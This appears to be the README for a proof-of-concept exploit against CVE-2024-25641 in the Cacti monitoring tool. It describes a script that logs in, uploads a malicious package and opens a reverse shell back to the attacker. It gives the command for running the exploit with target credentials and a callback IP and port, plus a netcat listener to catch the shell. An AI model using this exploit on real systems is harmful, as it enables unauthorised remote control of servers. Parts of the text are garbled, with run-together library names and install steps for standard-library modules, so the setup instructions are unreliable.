This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.
- Python 3.x
requestslibraryargparselibraryrelibrary
You can install the required Python library using pip3:
pip3 install requests
pip3 install argparse
pip3 install re(make sure to place the test.xml.gz in the same directory as the exploit.py)
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]nc -nvlp <port>